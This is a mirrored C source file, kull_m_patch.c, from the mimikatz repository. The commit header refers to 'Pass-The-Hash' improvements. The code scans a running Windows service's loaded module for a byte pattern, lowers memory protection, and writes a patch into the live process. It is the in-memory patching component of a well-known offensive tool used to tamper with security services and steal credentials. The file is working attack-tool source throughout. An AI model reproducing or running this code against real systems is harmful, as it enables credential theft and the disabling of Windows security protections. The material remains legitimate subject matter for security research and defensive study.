mirror of
https://github.com/gentilkiwi/mimikatz
synced 2024-12-12 09:05:19 +00:00
5571133a4b
MSV 'Pass-The-Hash' improvements Better Crypto output README update
121 lines
4.7 KiB
C
121 lines
4.7 KiB
C
/* Benjamin DELPY `gentilkiwi`
|
|
http://blog.gentilkiwi.com
|
|
benjamin@gentilkiwi.com
|
|
Licence : http://creativecommons.org/licenses/by/3.0/fr/
|
|
*/
|
|
#include "kull_m_patch.h"
|
|
|
|
BOOL kull_m_patch(PKULL_M_MEMORY_SEARCH sMemory, PKULL_M_MEMORY_ADDRESS pPattern, SIZE_T szPattern, PKULL_M_MEMORY_ADDRESS pPatch, SIZE_T szPatch, LONG offsetOfPatch, PKULL_M_PATCH_CALLBACK pCallBackBeforeRestore, int argc, wchar_t * args[], NTSTATUS * pRetCallBack)
|
|
{
|
|
BOOL result = FALSE, resultBackup = !pCallBackBeforeRestore, resultProtect = TRUE;
|
|
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
|
KULL_M_MEMORY_ADDRESS destination = {NULL, sMemory->kull_m_memoryRange.kull_m_memoryAdress.hMemory};
|
|
KULL_M_MEMORY_ADDRESS backup = {NULL, &hLocalMemory};
|
|
MEMORY_BASIC_INFORMATION readInfos;
|
|
NTSTATUS status;
|
|
DWORD flags, oldProtect = 0, tempProtect = 0;
|
|
|
|
if(kull_m_memory_search(pPattern, szPattern, sMemory, TRUE))
|
|
{
|
|
destination.address = (LPBYTE) sMemory->result + offsetOfPatch;
|
|
|
|
if(!resultBackup)
|
|
if(backup.address = LocalAlloc(LPTR, szPatch))
|
|
resultBackup = kull_m_memory_copy(&backup, &destination, szPatch);
|
|
|
|
if(resultBackup)
|
|
{
|
|
if(kull_m_memory_query(&destination, &readInfos))
|
|
{
|
|
flags = readInfos.Protect & ~0xff;
|
|
if((readInfos.Protect & 0x0f) && ((readInfos.Protect & 0x0f) < PAGE_READWRITE))
|
|
tempProtect = PAGE_READWRITE;
|
|
else if((readInfos.Protect & 0xf0) && ((readInfos.Protect & 0xf0) < PAGE_EXECUTE_READWRITE))
|
|
tempProtect = PAGE_EXECUTE_READWRITE;
|
|
|
|
if(tempProtect)
|
|
resultProtect = kull_m_memory_protect(&destination, szPatch, tempProtect | flags, &oldProtect);
|
|
|
|
if(resultProtect)
|
|
{
|
|
if(result = kull_m_memory_copy(&destination, pPatch, szPatch))
|
|
{
|
|
if(pCallBackBeforeRestore)
|
|
{
|
|
status = pCallBackBeforeRestore(argc, args);
|
|
if(pRetCallBack)
|
|
*pRetCallBack = status;
|
|
result = kull_m_memory_copy(&destination, &backup, szPatch);
|
|
}
|
|
}
|
|
if(oldProtect)
|
|
kull_m_memory_protect(&destination, szPatch, oldProtect, NULL);
|
|
}
|
|
}
|
|
if(backup.address)
|
|
LocalFree(backup.address);
|
|
}
|
|
}
|
|
return result;
|
|
}
|
|
|
|
PKULL_M_PATCH_GENERIC kull_m_patch_getGenericFromBuild(PKULL_M_PATCH_GENERIC generics, SIZE_T cbGenerics, DWORD BuildNumber)
|
|
{
|
|
SIZE_T i;
|
|
PKULL_M_PATCH_GENERIC current = NULL;
|
|
|
|
for(i = 0; i < cbGenerics; i++)
|
|
{
|
|
if(generics[i].MinBuildNumber <= BuildNumber)
|
|
current = &generics[i];
|
|
else break;
|
|
}
|
|
return current;
|
|
}
|
|
|
|
BOOL kull_m_patch_genericProcessOrServiceFromBuild(PKULL_M_PATCH_GENERIC generics, SIZE_T cbGenerics, PCWSTR processOrService, PCWSTR moduleName, BOOL isService) // to do for process // to do callback ! (vault & lsadump)
|
|
{
|
|
BOOL result = FALSE;
|
|
SERVICE_STATUS_PROCESS ServiceStatusProcess;
|
|
PKULL_M_MEMORY_HANDLE hMemory;
|
|
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
|
KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION iModule;
|
|
HANDLE hProcess;
|
|
KULL_M_MEMORY_ADDRESS
|
|
aPatternMemory = {NULL, &hLocalMemory},
|
|
aPatchMemory = {NULL, &hLocalMemory};
|
|
KULL_M_MEMORY_SEARCH sMemory;
|
|
|
|
PKULL_M_PATCH_GENERIC currenReferences;
|
|
|
|
if(currenReferences = kull_m_patch_getGenericFromBuild(generics, cbGenerics, MIMIKATZ_NT_BUILD_NUMBER))
|
|
{
|
|
aPatternMemory.address = currenReferences->Search.Pattern;
|
|
aPatchMemory.address = currenReferences->Patch.Pattern;
|
|
if(kull_m_service_getUniqueForName(processOrService, &ServiceStatusProcess))
|
|
{
|
|
if(ServiceStatusProcess.dwCurrentState >= SERVICE_RUNNING)
|
|
{
|
|
if(hProcess = OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_QUERY_INFORMATION, FALSE, ServiceStatusProcess.dwProcessId))
|
|
{
|
|
if(kull_m_memory_open(KULL_M_MEMORY_TYPE_PROCESS, hProcess, &hMemory))
|
|
{
|
|
if(kull_m_process_getVeryBasicModuleInformationsForName(hMemory, moduleName, &iModule))
|
|
{
|
|
sMemory.kull_m_memoryRange.kull_m_memoryAdress = iModule.DllBase;
|
|
sMemory.kull_m_memoryRange.size = iModule.SizeOfImage;
|
|
|
|
if(result = kull_m_patch(&sMemory, &aPatternMemory, currenReferences->Search.Length, &aPatchMemory, currenReferences->Patch.Length, currenReferences->Offsets.off0, NULL, 0, NULL, NULL))
|
|
kprintf(L"\"%s\" service patched\n", processOrService);
|
|
else
|
|
PRINT_ERROR_AUTO(L"kull_m_patch");
|
|
} else PRINT_ERROR_AUTO(L"kull_m_process_getVeryBasicModuleInformationsForName");
|
|
kull_m_memory_close(hMemory);
|
|
}
|
|
} else PRINT_ERROR_AUTO(L"OpenProcess");
|
|
} else PRINT_ERROR(L"Service is not running\n");
|
|
} else PRINT_ERROR_AUTO(L"kull_m_service_getUniqueForName");
|
|
} else PRINT_ERROR(L"Incorrect version in references\n");
|
|
|
|
return result;
|
|
} |